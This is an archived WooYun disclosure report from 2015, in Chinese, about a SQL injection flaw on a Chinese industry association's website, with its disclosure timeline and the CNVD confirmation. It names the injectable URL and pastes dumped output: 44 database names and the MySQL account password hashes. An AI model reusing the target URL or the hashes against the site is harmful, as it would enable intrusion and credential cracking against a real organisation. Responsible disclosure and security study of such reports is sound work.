乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-15: 细节已通知厂商并且等待厂商处理中 2015-07-17: 厂商已经确认,细节仅向厂商公开 2015-07-27: 细节向核心白帽子及相关领域专家公开 2015-08-06: 细节向普通白帽子公开 2015-08-16: 细节向实习白帽子公开 2015-08-31: 细节向公众公开
注入 注入 注出水
http://www.ccsa.org.cn/showgn.php3?source=yd&id=4550
随便加个单引号 出错~~ ~.~
available databases [44]:[*] article[*] auth[*] ccsa_access_log[*] ccsadoc[*] client_update[*] customer[*] del_mladvert[*] del_ptpic[*] del_pw_log[*] del_style[*] del_test[*] del_tmparticle[*] doc[*] fileopen[*] ftpusers[*] good_member[*] gsc15[*] information_schema[*] IOofCOM[*] jiaoliu[*] log[*] logs[*] lost+found[*] maintain[*] meeting[*] ml4ccsa[*] ml4ptsn[*] mnogosearch[*] mysql[*] phpmyadmin[*] prod[*] prodex[*] questionnaire[*] sales[*] shenbao[*] std[*] std_temp[*] stdcd[*] tc485[*] test[*] tlc[*] tspc[*] userstd[*] vpopmail
database management system users password hashes:[*] auth_rd [1]: password hash: 38755f107acb1b50[*] auth_rw [1]: password hash: 6c90aa2604862b9b[*] backup [1]: password hash: 0af4727b4f928228[*] ccsa_rd [1]: password hash: 6ec627e402484936[*] ccsa_rw [1]: password hash: 1c9c80061d48e945[*] doc_rd [1]: password hash: 362f29946e86ae30[*] doc_rw [1]: password hash: 57cf2b7f207cc98c[*] ftp [1]: password hash: 694bf0e84e1746b6[*] infosrv [1]: password hash: 0107187807836006[*] log_rd [1]: password hash: 773359240eb9a1d9[*] log_rw [1]: password hash: 1f1d533a5b0f5247[*] mailuser [1]: password hash: 0206b55f23e2e967[*] maint_rw [1]: password hash: 06988dd331f93204[*] mepadmin [1]: password hash: 13f162af21797902[*] minfosrv [1]: password hash: 6fc780f149d98015[*] mlog [1]: password hash: 32099b90045157c1[*] mproduct [1]: password hash: 4b31b6b72a2ffa73[*] mptpic [1]: password hash: 7f38034b3972ae37[*] mptqc [1]: password hash: 7363df490bd6e5ee[*] mptsn_auth [1]: password hash: 300582b60d0ce39f[*] prod_rd [1]: password hash: 7ac54f89754e39ab[*] prod_rw [1]: password hash: 3d4faebb32aedf8c[*] ptpic [1]: password hash: 58eba2fc22d22204[*] ptpic_rd [1]: password hash: 12e8cd2f1c97b82d[*] ptpic_rw [1]: password hash: 6f8c7ba26dfd93fe[*] ptqc [1]: password hash: 67c4ea1842a027a1[*] ptqc_rd [1]: password hash: 326fd13f1db64eba[*] ptqc_rw [1]: password hash: 472c940019929961[*] ptsn_auth [1]: password hash: 5bd622e73f6459c9[*] readall [1]: password hash: 34bba4f421608fb9[*] root [1]: password hash: 5b85aec77f441075[*] shouli [1]: password hash: 32a437f543402d9c[*] shouli_rd [1]: password hash: 408efbf60d3c8899[*] shouli_rw [1]: password hash: 0bbe89a47b7e9f94[*] std_rd [1]: password hash: 57aec995239e6fc7[*] std_rw [1]: password hash: 0c979a9e1a1a7df0[*] tlcadmin [1]: password hash: 0c979a9e1a1a7df0[*] tlcwebuser [1]: password hash: 14780cf32b1ea347[*] userstd_rw [1]: password hash: 6360f4a4380593b6[*] vpopmail [1]: password hash: 654925394d80d5e4
waf+过滤
危害等级:中
漏洞Rank:9
确认时间:2015-07-17 16:04
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。
暂无